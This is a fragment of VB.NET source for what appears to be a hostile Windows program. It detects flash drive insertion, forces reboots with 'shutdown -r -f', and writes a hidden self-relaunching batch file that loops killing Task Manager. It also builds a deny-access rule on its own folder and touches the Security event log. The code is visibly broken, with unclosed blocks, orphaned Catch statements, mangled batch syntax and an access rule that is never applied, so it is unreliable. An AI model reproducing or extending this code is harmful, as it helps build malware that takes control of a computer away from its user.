    'Detect Flash Drive Insertion | Auto-Start Application "

    'Function that gets the "Drive Letter" from the unit mask
    'This detects flash plug-in>>>
    Private Function GetDriveLetterFromMask(ByRef Unit As Integer) As Char
        On Error Resume Next
        For i As Integer = 0 To 25
            If Unit = (2 ^ i) Then
                Return Chr(Asc("A") + i)
            End If
    End Function

    Private Sub Timer3_Tick(sender As Object, e As EventArgs) Handles Timer3.Tick

    End Sub

    Private Sub Timer4_Tick(sender As Object, e As EventArgs) Handles Timer4.Tick
        Process.Start("shutdown", "-r -f -t 5") '3.5 seconds
    End Sub

    ' This is how you launch batch Script through VB.Net coding. Basically , this creates a bat file that loops
    ' killing task manager
    Private Sub AntiTaskManager()
            Dim rythorian77 As New StringBuilder
            rythorian77.AppendLine("@echo off")
            rythorian77.AppendLine("Title: Batch AutoHideStart by: Rythorian77 (Justin Linwood Ross)")
            rythorian77.AppendLine("IF [""%~1""]==[""-e""] GoTo o")
            rythorian77.AppendLine(":Clear vbs")
            rythorian77.AppendLine("set Batch=%~%dpnx0")
            rythorian77.AppendLine("echo set objshell^= createobject^(""""^)")
            rythorian77.AppendLine("echo obshell^.run ""%Batch% -e""^,vbhide ) > %temp%\bas.vbs")
            rythorian77.AppendLine("start %temp%\bas.vbs")
            rythorian77.AppendLine("Taskkill /IM taskmgr.exe /FI ""STATUS eq RUNNING"" /F")
            rythorian77.AppendLine("goto loop")
            rythorian77.AppendLine("IF NOT %ERRORLEVEL%==0")
            rythorian77.AppendLine("CreateObject(""Wscript.Shell"").Run ""HyperNova.bat"", 0, True")
            rythorian77.AppendLine("GoTo begin")

            File.WriteAllText("AntiTaskManager.bat", rythorian77.ToString())
        Catch ex As Exception
        End Try
    End Sub

    'In most cases, the string returned by this method consists of all characters in the path up to, but not including,
    'the last directory separator character(s). A directory separator character can be either DirectorySeparatorChar or
    'AltDirectorySeparatorChar. If the path consists of a root directory, such as "c:\", null is returned.
    'This method does Not support paths Using "file:".
    'Because the returned path does Not include the last directory separator character(s),
    'passing the returned path back into the GetDirectoryName method truncates one folder level per subsequent
    'Call On the result path. For example, passing the path "C:\Directory\SubDirectory\test.txt" into GetDirectoryName
    'returns "C:\Directory\SubDirectory". Passing that path, "C:\Directory\SubDirectory", into GetDirectoryName
    'returns "C:\Directory".
    Private Sub MatriArk()
        On Error GoTo Err
        Dim folderPath As String = Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location)
        Dim adminUserName As String = Environment.UserName
        Dim ds As DirectorySecurity = Directory.GetAccessControl(folderPath)
        Dim fsa As New FileSystemAccessRule(adminUserName, FileSystemRights.FullControl, AccessControlType.Deny)
        Directory.SetAccessControl(folderPath, ds)

        Dim eventLog = New EventLog("Security", Environment.MachineName)
        For Each eventLog In EventLog.GetEventLogs()
    End Sub

    Private Sub Timer5_Tick(sender As Object, e As EventArgs) Handles Timer5.Tick
    End Sub

    Private Sub Timer6_Tick(sender As Object, e As EventArgs) Handles Timer6.Tick
    End Sub

    Private Sub Timer7_Tick(sender As Object, e As EventArgs) Handles Timer7.Tick
    End Sub
End Class
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